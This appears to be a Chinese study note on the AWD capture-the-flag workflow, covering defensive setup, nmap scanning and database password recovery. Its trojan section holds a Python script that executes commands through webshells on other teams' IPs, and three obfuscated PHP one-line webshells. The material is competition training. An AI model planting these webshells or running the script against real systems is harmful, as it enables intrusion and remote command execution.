AWD网络攻防流程

学习攻防,记录学习过程

连接主机,下载源码

得到ip地址,打开winscp,将ip填入主机名,点击登录;然后输入用户名密码,连接成功

连接好后就可以上传、下载、删除linux服务器文件

要备份至少三份HTML文件

在Windows浏览器输入linux ip地址即可访问网站;

修改ssh密码

用xshell连接上后台,打开终端输入

passwd

然后输入新密码即可

扫后门

将备份目录拖到D盾这个工具中扫描,看看是否留有后门

可以右键查看文件内容

发现有后门要立刻删除,并且利用这个后门攻击其他服务器

扫描其他队伍ip及端口

可以扫描发现其他队伍的ip

扫描局域网内存活主机

nmap -sP 192.168.0.0/24

扫描端口

nmap -sS -p 1-65535 -v 192.168.xx
指定1-65535端口扫描,-v显示详细信息

数据库

一般在ip后输入/admin能跳转到后台登录的页面

如果不知道后台登录的密码,可以从数据库里面查找

用xshell连接后台,打开终端,然后切换到

/var/www/html

输入

mysql -uroot -p

回车输入数据库密码。密码从后台文件data/config.php里面找

之后进行查询,找到的密码被md5加密了,就解密一下即可登录管理后台,如果为弱密码,则要及时更改

木马

利用一句话木马

若存有一句话木马,可直接用python脚本跑出其他ip的flag文件,不必使用菜刀一个个连接其他ip去找flag文件

import requests
url = "http://192.168.159."  # 可变,ip地址网段
shell = "/upload/img/201808152140042358.php"  # 可变,一句话木马文件所在目录
passwd = "1"  # 可变,一句话木马密码
port = "80"  # 可变,端口号
payload = {passwd: "system('cat firstround_flag.txt');"}   # 可变,改为flag所在文件名及目录

for i in [131, 145, 146, 147]:       # 可变,其他ip地址
    url1 = url + str(i) + ":" + port + shell
    try:
        res = requests.post(url1, payload, timeout=1)
        if res.status_code == requests.codes.ok:
            print(url1 + " connect shell success,flag is " + res.text)
        else:
            print("shell 404")
    except Exception as e:
        print(url1+" connect shell fail")

非常规一句话木马

一些非常规的一句话木马可以防止对方通过你种下的一句话来攻击别的队伍拿到分数

1.

<?php ($_=@$_GET[2]).@$_($_POST[1])?>
连接方式:?2=assert
密码:1

2.

<?php
$a=chr(96^5);
$b=chr(57^79);
$c=chr(15^110);
$d=chr(58^86);
$e='($_REQUEST[C])';
@assert($a.$b.$c.$d.$e);
?>
连接方式:?b=))99(rhC(tseuqeR+lave

3.

<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];
if(isset($s22))
{
eval($s21($s22));
}
?>
连接方式:配置填n985de9=QGV2YWwoJF9QT1NUWzBdKTs= 
连接密码:0

部署waf

将waf上传到服务器,在需要部署waf的文件中加上

include('waf.php')

如果在index.php中以及部署了waf,可以在终端运行

php index.php

查看是否部署成功,如果失败会报错

部署文件监控

打开xshell这个工具,这个工具就是远程终端模拟系统

连接上ip后可以执行linux指令

查看python版本:

python --version

上传文件监控脚本到服务器,然后在xshell中运行

cd /var/www/html
python file_check2.py

就可以了

挖漏洞

使用SQLmap

看到疑似SQL注入的漏洞可以扫描一下